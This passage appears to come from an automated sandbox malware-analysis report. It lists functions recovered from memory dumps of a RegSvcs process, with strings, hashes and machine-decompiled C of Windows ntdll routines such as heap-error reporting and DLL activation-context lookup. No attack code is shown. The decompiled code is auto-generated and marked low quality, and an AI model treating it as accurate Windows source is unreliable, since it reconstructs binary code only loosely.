
0x00418933
0x0041894a
0x00418958

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418958

Memory Dump Source

Source File: 00000005.00000002.383935047.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: c6ffa8f41277cedcd146721b33de4ab2dd662f0a832426917f21051448e796de
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 90D012716042147BD620DB99CC85FD7779CDF48790F018065FA1C5B241C531BA00C6E1

Uniqueness

Uniqueness Score: -1.00%

Function 00A8967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A89694

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9dd0f43773cd0cfe07376da10d986f0f9666fa2ce6979c8cac9c6bc30d8b6cbe
Instruction ID: 69e272cb4206e207e8035814be2349d8b062bb0bc65c80345487d6ea2a38ba76
Opcode Fuzzy Hash: 9dd0f43773cd0cfe07376da10d986f0f9666fa2ce6979c8cac9c6bc30d8b6cbe
Instruction Fuzzy Hash: 25B09B719014C5C5DB11E7704708737794077D0741F16C071D1020641A4778C4D1F6B6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00AFB260 Relevance: 37.8, Strings: 30, Instructions: 262COMMONLIBRARYCODE

Download Yara Rule

Strings

*** enter .cxr %p for the context, xrefs: 00AFB50D
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 00AFB484
write to, xrefs: 00AFB4A6
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00AFB38F
*** Resource timeout (%p) in %ws:%s, xrefs: 00AFB352
*** then kb to get the faulting stack, xrefs: 00AFB51C
Go determine why that thread has not released the critical section., xrefs: 00AFB3C5
The resource is owned exclusively by thread %p, xrefs: 00AFB374
*** A stack buffer overrun occurred in %ws:%s, xrefs: 00AFB2F3
The instruction at %p referenced memory at %p., xrefs: 00AFB432
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 00AFB323
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 00AFB305
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 00AFB53F
The instruction at %p tried to %s , xrefs: 00AFB4B6
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 00AFB476
The resource is owned shared by %d threads, xrefs: 00AFB37E
an invalid address, %p, xrefs: 00AFB4CF
*** enter .exr %p for the exception record, xrefs: 00AFB4F1
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00AFB3D6
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 00AFB39B
<unknown>, xrefs: 00AFB27E, 00AFB2D1, 00AFB350, 00AFB399, 00AFB417, 00AFB48E
*** Inpage error in %ws:%s, xrefs: 00AFB418
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 00AFB314
a NULL pointer, xrefs: 00AFB4E0
*** An Access Violation occurred in %ws:%s, xrefs: 00AFB48F
The critical section is owned by thread %p., xrefs: 00AFB3B9
This failed because of error %Ix., xrefs: 00AFB446
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 00AFB2DC
read from, xrefs: 00AFB4AD, 00AFB4B2
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 00AFB47D

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: 6b72146b53172a9b05ba3befa850d0be2830530e434703fee022c54e992bea7b
Instruction ID: 18f6cafb4683146b308bae08de98bbfe6f8f0b03c46cdd75c8c87d3c1785f236
Opcode Fuzzy Hash: 6b72146b53172a9b05ba3befa850d0be2830530e434703fee022c54e992bea7b
Instruction Fuzzy Hash: C0811235A50214FFCB21ABA5DD86E7B3B36BF46B52F100445F2062F6A3D3658811DBB2

Uniqueness

Uniqueness Score: -1.00%

Function 00B01C06 Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E00B01C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0xa248a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00A4B150();
				} else {
					E00A4B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0xb3589c);
				E00A4B150("Heap error detected at %p (heap handle %p)\n",  *0xb358a0);
				_t27 =  *0xb35898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M00B01E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00A4B150();
				} else {
					E00A4B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E00A4B150("Error code: %d - %s\n",  *0xb35898);
				_t113 =  *0xb358a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00A4B150();
					} else {
						E00A4B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00A4B150("Parameter1: %p\n",  *0xb358a4);
				}
				_t115 =  *0xb358a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00A4B150();
					} else {
						E00A4B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00A4B150("Parameter2: %p\n",  *0xb358a8);
				}
				_t117 =  *0xb358ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00A4B150();
					} else {
						E00A4B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00A4B150("Parameter3: %p\n",  *0xb358ac);
				}
				_t119 =  *0xb358b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00A4B150();
					} else {
						E00A4B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0xb358b4);
					E00A4B150("Last known valid blocks: before - %p, after - %p\n",  *0xb358b0);
				} else {
					_t120 =  *0xb358b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00A4B150();
				} else {
					E00A4B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E00A4B150("Stack trace available at %p\n", 0xb358c0);
			}

0x00b01c10
0x00b01c16
0x00b01c1e
0x00b01c3d
0x00b01c3e
0x00b01c20
0x00b01c35
0x00b01c3a
0x00b01c44
0x00b01c55
0x00b01c5a
0x00b01c65
0x00b01c67
0x00000000
0x00b01c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00b01c67
0x00b01cdc
0x00b01ce5
0x00b01d04
0x00b01d05
0x00b01ce7
0x00b01cfc
0x00b01d01
0x00b01d0b
0x00b01d17
0x00b01d1f
0x00b01d25
0x00b01d30
0x00b01d4f
0x00b01d50
0x00b01d32
0x00b01d47
0x00b01d4c
0x00b01d61
0x00b01d67
0x00b01d68
0x00b01d6e
0x00b01d79
0x00b01d98
0x00b01d99
0x00b01d7b
0x00b01d90
0x00b01d95
0x00b01daa
0x00b01db0
0x00b01db1
0x00b01db7
0x00b01dc2
0x00b01de1
0x00b01de2
0x00b01dc4
0x00b01dd9
0x00b01dde
0x00b01df3
0x00b01df9
0x00b01dfa
0x00b01e00
0x00b01e0a
0x00b01e13
0x00b01e32
0x00b01e33
0x00b01e15
0x00b01e2a
0x00b01e2f
0x00b01e39
0x00b01e4a
0x00b01e02
0x00b01e02
0x00b01e08
0x00000000
0x00000000
0x00b01e08
0x00b01e5b
0x00b01e7a
0x00b01e7b
0x00b01e5d
0x00b01e72
0x00b01e77
0x00b01e95

Strings

HEAP: , xrefs: 00B01C16, 00B01C3D, 00B01D04, 00B01D4F, 00B01D98, 00B01DE1, 00B01E32, 00B01E7A
heap_failure_block_not_busy, xrefs: 00B01CA6
heap_failure_virtual_block_corruption, xrefs: 00B01C91
heap_failure_usage_after_free, xrefs: 00B01CBB
heap_failure_entry_corruption, xrefs: 00B01C83
Parameter3: %p, xrefs: 00B01DEE
heap_failure_unknown, xrefs: 00B01C75
heap_failure_multiple_entries_corruption, xrefs: 00B01C8A
Stack trace available at %p, xrefs: 00B01E86
heap_failure_invalid_allocation_type, xrefs: 00B01CB4
HEAP[%wZ]: , xrefs: 00B01C30, 00B01CF7, 00B01D42, 00B01D8B, 00B01DD4, 00B01E25, 00B01E6D
heap_failure_lfh_bitmap_mismatch, xrefs: 00B01CD7
heap_failure_cross_heap_operation, xrefs: 00B01CC2
heap_failure_listentry_corruption, xrefs: 00B01CD0
heap_failure_buffer_overrun, xrefs: 00B01C98
heap_failure_invalid_argument, xrefs: 00B01CAD
Last known valid blocks: before - %p, after - %p, xrefs: 00B01E45
Error code: %d - %s, xrefs: 00B01D12
heap_failure_buffer_underrun, xrefs: 00B01C9F
Parameter1: %p, xrefs: 00B01D5C
Parameter2: %p, xrefs: 00B01DA5
heap_failure_freelists_corruption, xrefs: 00B01CC9
heap_failure_generic, xrefs: 00B01C7C
Heap error detected at %p (heap handle %p), xrefs: 00B01C50
heap_failure_internal, xrefs: 00B01C6E

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: 9ab521d2afe4f3e64039157a7db10140b83fec755778f051b5ca7e501f020428
Instruction ID: 2d3b1d3ab7b080b41891bc62f2f1f95503a4f2905ad91d0ea18fc9468c9d6916
Opcode Fuzzy Hash: 9ab521d2afe4f3e64039157a7db10140b83fec755778f051b5ca7e501f020428
Instruction Fuzzy Hash: C961D336561544DFD329DB9CE996E2477E4FB04B20B2989BAF80A6F3D1CB34DC40CA19

Uniqueness

Uniqueness Score: -1.00%

Function 00A53D34 Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00A53D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E00A51B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E00A51B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E00A51B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E00A51B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E00A51B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L00A64620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E00A8F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E00A91370(_t276, 0xa24e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E00A8BB40(0,  &_v68, _t170);
									if(L00A543C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E00A8BB40(_t257,  &_v68, _t243);
								if(L00A543C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E00A91370(_t278, 0xa24e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L00A64620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E00A8F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E00A91370(_v16, 0xa24e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E00A8BB40(_t262,  &_v68, _t244);
								if(L00A543C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E00A91370(_t282, 0xa24e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E00A8BB40(_t262,  &_v68, _t201);
							if(L00A543C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L00A64620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E00A8F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E00A91370(_t280, 0xa24e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E00A8BB40(_t267,  &_v68, _t245);
							if(L00A543C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E00A91370(_t284, 0xa24e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E00A8BB40(_t267,  &_v68, _t224);
						if(L00A543C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x00a53d3c
0x00a53d42
0x00a53d44
0x00a53d46
0x00a53d49
0x00a53d4c
0x00a53d4f
0x00a53d52
0x00a53d55
0x00a53d58
0x00a53d5b
0x00a53d5f
0x00a53d61
0x00a53d66
0x00aa8213
0x00aa8218
0x00a54085
0x00a54088
0x00a5408e
0x00a54094
0x00a5409a
0x00a540a0
0x00a540a6
0x00a540a9
0x00a540af
0x00a540b6
0x00a540bd
0x00a540bd
0x00a53d83
0x00aa821f
0x00aa8229
0x00aa8238
0x00aa8238
0x00aa823d
0x00aa823d
0x00a53da0
0x00a53daf
0x00a53db5
0x00a53dba
0x00a53dba
0x00a53dd4
0x00a53e94
0x00a53eab
0x00a53f6d
0x00a53f84
0x00a5406b
0x00a5406b
0x00a5406e
0x00a5406e
0x00a54070
0x00a54074
0x00aa8351
0x00aa8351
0x00a5407a
0x00a5407f
0x00aa835d
0x00aa8370
0x00aa8377
0x00aa8379
0x00aa837c
0x00aa837c
0x00aa835d
0x00000000
0x00a5407f
0x00a53f8a
0x00a53f8d
0x00a53f90
0x00a53f95
0x00aa830d
0x00aa830f
0x00a53f9b
0x00a53fac
0x00a53fae
0x00a53fb1
0x00a53fb1
0x00a53fb6
0x00aa8317
0x00aa831a
0x00000000
0x00a53fbc
0x00a53fc1
0x00a53fc9
0x00a53fd7
0x00a53fda
0x00a53fdd
0x00a54021
0x00a54021
0x00a54029
0x00a54030
0x00a54044
0x00a54046
0x00a54046
0x00a54044
0x00a54049
0x00aa8327
0x00aa8334
0x00aa8339
0x00aa833c
0x00a5404f
0x00a5404f
0x00a5404f
0x00a54051
0x00a54056
0x00a54063
0x00a54063
0x00a54068
0x00000000
0x00a54068
0x00a53fdf
0x00a53fe2
0x00a53fe4
0x00a53fe7
0x00a53fef
0x00a54003
0x00a54005
0x00a54005
0x00a5400c
0x00a54013
0x00a54016
0x00a54017
0x00a5401b
0x00a5401e
0x00000000
0x00a5401e
0x00a53fb6
0x00a53eb1
0x00a53eb4
0x00a53eb7
0x00a53ebc
0x00aa82a9
0x00aa82ab
0x00a53ec2
0x00a53ed3
0x00a53ed5
0x00a53ed8
0x00a53ed8
0x00a53edd
0x00aa82b3
0x00aa82b6
0x00000000
0x00a53ee3
0x00a53ee8
0x00a53eed
0x00a53ef0
0x00a53ef3
0x00a53f02
0x00a53f05
0x00a53f08
0x00aa82c0
0x00aa82c3
0x00aa82c5
0x00aa82c8
0x00aa82d0
0x00aa82e4
0x00aa82e6
0x00aa82e6
0x00aa82ed
0x00aa82f4
0x00aa82f7
0x00aa82f8
0x00aa82fc
0x00aa82ff
0x00aa82ff
0x00a53f0e
0x00a53f11
0x00a53f16
0x00a53f1d
0x00a53f31
0x00aa8307
0x00aa8307
0x00a53f31
0x00a53f39
0x00a53f48
0x00a53f4d
0x00a53f50
0x00a53f50
0x00a53f53
0x00a53f58
0x00a53f65
0x00a53f65
0x00a53f6a
0x00000000
0x00a53f6a
0x00a53edd
0x00a53dda
0x00a53ddd
0x00a53de0
0x00a53de5
0x00aa8245
0x00a53deb
0x00a53df7
0x00a53dfc
0x00a53dfe
0x00a53e01
0x00a53e01
0x00a53e06
0x00aa824d
0x00aa824f
0x00aa8254
0x00000000
0x00a53e0c
0x00a53e11
0x00a53e16
0x00a53e19
0x00a53e29
0x00a53e2c
0x00a53e2f
0x00aa825c
0x00aa825f
0x00aa8261
0x00aa8264
0x00aa826c
0x00aa8280
0x00aa8282
0x00aa8282
0x00aa8289
0x00aa8290
0x00aa8293
0x00aa8294
0x00aa8298
0x00aa829b
0x00aa829b
0x00a53e35
0x00a53e38
0x00a53e3d
0x00a53e44
0x00a53e58
0x00aa82a3
0x00aa82a3
0x00a53e58
0x00a53e60
0x00a53e6f
0x00a53e74
0x00a53e77
0x00a53e77
0x00a53e7a
0x00a53e7f
0x00a53e8c
0x00a53e8c
0x00a53e91
0x00000000
0x00a53e91

Strings

Kernel-MUI-Language-Disallowed, xrefs: 00A53E97
WindowsExcludedProcs, xrefs: 00A53D6F
Kernel-MUI-Number-Allowed, xrefs: 00A53D8C
Kernel-MUI-Language-Allowed, xrefs: 00A53DC0
Kernel-MUI-Language-SKU, xrefs: 00A53F70

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: b5542bac91331a446892c6460c5a6c8ca11309e89f05f9baa87e67185e9cc2a3
Instruction ID: b0ca92ee3c664d54e84940075f5f8d7c0bcf28a8850aac78620888492bec7399
Opcode Fuzzy Hash: b5542bac91331a446892c6460c5a6c8ca11309e89f05f9baa87e67185e9cc2a3
Instruction Fuzzy Hash: 33F13A72D10219EBCF11DF98CA81AEEBBF9FF49750F15006AE905AB251D7349E05CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A78E00 Relevance: 6.4, Strings: 5, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E00A78E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0xb3d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0xb38464; // 0x74e10110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0xb35780 & 0x00000003) != 0) {
							E00AC5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0xb35780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E00A8B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0xb37984; // 0x522b70
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0xb38464; // 0x74e10110
					 *0xb3b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E00A79B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0xb35780 & 0x00000005) != 0) {
						_push(_t49);
						E00AC5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
